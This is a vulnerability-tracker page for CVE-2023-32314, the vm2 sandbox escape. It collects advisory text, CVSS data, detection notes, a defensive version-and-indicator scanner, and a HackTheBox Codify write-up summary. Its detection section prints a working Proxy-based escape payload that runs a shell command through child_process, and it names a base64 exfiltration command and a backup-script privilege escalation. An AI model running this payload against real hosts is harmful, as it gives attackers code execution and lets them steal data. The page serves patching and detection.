CVE-2023-32314
Published 2023-05-15
Priority P273 · critical · 10 · CVSS 3.1
Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
EPSS: 5.60% (91.9th percentile)
vm2 is a sandbox that can run untrusted code with Node's built-in modules. A sandbox escape vulnerability exists in vm2 for versions up to and including 3.9.17. It abuses an unexpected creation of a host object based on the specification of `Proxy`. As a result a threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version `3.9.18` of `vm2`. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| patriksimek | vm2 | < 3.9.18 | 3.9.18 |
| vm2_project | vm2 | < 3.9.18 | 3.9.18 |
| vm2_project | vm2 | >= 0 < 3.9.18 | 3.9.18 |
Detection & IOCs (extracted from sources)
Command:
```javascript
const err = new Error();
err.name = {
  toString: new Proxy(() => "", {
    apply(target, thiz, args) {
      const process = args.constructor.constructor("return process")();
      throw process.mainModule.require("child_process").execSync("ping -c1 10.10.14.14").toString();
    },
  }),
};
try {
  err.stack;
} catch (stdout) {
  stdout;
}
```
- CVE-2023-32314 exploit abuses Proxy-based host object creation in vm2 ≤3.9.17; detect JavaScript payloads calling `args.constructor.constructor("return process")()` within vm2 sandbox contexts to identify sandbox escape attempts.
- Monitor for `process.mainModule.require("child_process").execSync(...)` patterns in code submitted to vm2-backed Node.js sandboxes (e.g., on port 3000), as this is the RCE execution chain used post-escape.
- Alert on `base64 -w0 /var/www/contact/tickets.db` or similar base64 exfiltration commands executed on the host, indicating post-exploitation data theft of the SQLite credential store.
- Detect bash glob/wildcard injection against scripts using unquoted `==` comparisons in `[[ ]]` conditionals (e.g., supplying `a*` as input); this is a privilege escalation technique used against `/opt/scripts/mysql-backup.sh` running as root.
- The vm2 sandbox escape (CVE-2023-32314) affects all versions up to and including 3.9.17; version 3.9.18 contains the patch. The observed vulnerable deployment used version 3.9.16.
- No known workarounds exist for CVE-2023-32314; upgrading to vm2 ≥3.9.18 is the only remediation.
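As an added example (not code from the advisory or the vm2 project), the sketch below combines the two checks these notes call for: a version gate for the affected range and a scan of submitted code for the indicators listed above. The function names, indicator ids and sample strings are assumptions constructed for illustration.

```javascript
// Added example, not vm2 project code. Names and samples are assumptions.
const FIXED = [3, 9, 18]; // first patched vm2 release per the advisory

// True when a vm2 version string falls in the affected range (< 3.9.18).
function isVulnerableVm2(version) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(version).trim());
  if (!m) return true; // unparseable: treat as affected until verified
  const v = m.slice(1).map(Number);
  for (let i = 0; i < 3; i++) {
    if (v[i] !== FIXED[i]) return v[i] < FIXED[i];
  }
  return false;
}

// Indicators from the detection notes; whitespace-tolerant.
const INDICATORS = [
  { id: "constructor-return-process",
    re: /\.constructor\s*\.\s*constructor\s*\(\s*["'`]\s*return\s+process\b/ },
  { id: "mainmodule-require",
    re: /process\s*\.\s*mainModule\s*\.\s*require\s*\(/ },
  { id: "child-process-require",
    re: /require\s*\(\s*["'`]child_process["'`]\s*\)/ },
];

// Returns the ids of every indicator present in the submitted source.
function scanSubmission(source) {
  return INDICATORS.filter(({ re }) => re.test(source)).map(({ id }) => id);
}

// Combines both checks: block when indicators hit an affected version.
function triage(source, vm2Version) {
  const hits = scanSubmission(source);
  const vulnerable = isVulnerableVm2(vm2Version);
  let verdict = "allow";
  if (hits.length > 0) verdict = vulnerable ? "block-and-alert" : "alert";
  return { hits, vulnerable, verdict };
}

// Constructed samples: indicator fragments only, plus a benign Proxy use.
const SUSPICIOUS = [
  'const process = args.constructor.constructor("return process")();',
  'const cp = process.mainModule.require("child_process");',
].join("\n");
const BENIGN = "const p = new Proxy({}, { get: (t, k) => k }); p.x;";

console.log(triage(SUSPICIOUS, "3.9.16"));
console.log(triage(BENIGN, "3.9.18"));
```

String matching of this kind is a triage signal for logging and alerting, not a control; the `vulnerable` flag is the finding that requires action, since upgrading is the only remediation.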
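CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 10.0 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| vendor_redhat | | 9.8 | CRITICAL | |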
GHSA
vm2 Sandbox Escape vulnerability
ghsa·2023-05-15
CVE-2023-32314 [CRITICAL] CWE-74 vm2 Sandbox Escape vulnerability
vm2 Sandbox Escape vulnerability
A sandbox escape vulnerability exists in vm2 for versions up to 3.9.17. It abuses an unexpected creation of a host object based on the specification of `Proxy`.
### Impact
A threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox.
### Patches
This vulnerability was patched in the release of version `3.9.18` of `vm2`.
### Workarounds
None.
### References
PoC - https://gist.github.com/arkark/e9f5cf5782dec8321095be3e52acf5ac
### For more information
If you have any questions or comments about this advisory:
- Open an issue in [VM2](https://github.com/patriksimek/vm2)
Thanks to @arkark (Takeshi Kaneko) of GMO Cybersecurity by Ierae, Inc. for disclosing this vulnerability.
OSV
vm2 Sandbox Escape vulnerability
osv·2023-05-15
CVE-2023-32314 [CRITICAL] vm2 Sandbox Escape vulnerability
Red Hat
vm2: Sandbox Escape
vendor_redhat·2023-05-15·CVSS 9.8
CVE-2023-32314 [CRITICAL] CWE-915 vm2: Sandbox Escape
A flaw was found in the vm2 sandbox. When a host object is created based on the specification of Proxy, an attacker can bypass the sandbox protections. This may allow an attacker to run remote code execution on the host running the san
No detection rules found.
No public exploits indexed.
CTF
Codify / README
ctf_writeups·CVSS 9.8
CVE-2023-32314 [CRITICAL] Codify / README
# Codify - HackTheBox - Writeup
Linux, 20 Base Points, Easy
## Machine
## TL;DR
To solve this machine, we start by using `nmap` to enumerate open services and find ports `22`, `80`, and `3000`.
***User***: Discovered a website designed for testing NodeJS code utilizing `vm2`. Exploited `CVE-2023-32314` to escape the sandbox of `vm2` and achieve Remote Code Execution (RCE). This led to the discovery of the file `tickets.db`, which contains the hashed password of the `joshua` user.
***Root***: Identified the ability to execute the `/opt/scripts/mysql-backup.sh` script as `root`. Leveraged bash partial string matching to circumvent the if statement check within the script. Developed a Python script to retrieve the `root` password utilizing partial string matching.
## Codify Solution
CTF
easy / README
ctf_writeups·CVSS 6.0
[MEDIUM] easy / README
---
layout: default
title: Easy Machines
parent: Machines
nav_order: 1
description: "120+ Easy HTB machine writeups with walkthroughs"
permalink: /machines/easy/
---
# HackTheBox Easy Machines - Comprehensive Reference
> Complete catalog of retired HTB Easy machines with OS, key vulnerability, attack path summary, and quality writeup links.
**Total: 100+ Easy Machines** | Updated: April 2026
---
## Classic / Legac
- https://gist.github.com/arkark/e9f5cf5782dec8321095be3e52acf5ac
- https://github.com/patriksimek/vm2/commit/d88105f99752305c5b8a77b63ddee3ec86912daf
- https://github.com/patriksimek/vm2/releases/tag/3.9.18
- https://github.com/patriksimek/vm2/security/advisories/GHSA-whpj-8f3w-67p5
Published: 2023-05-15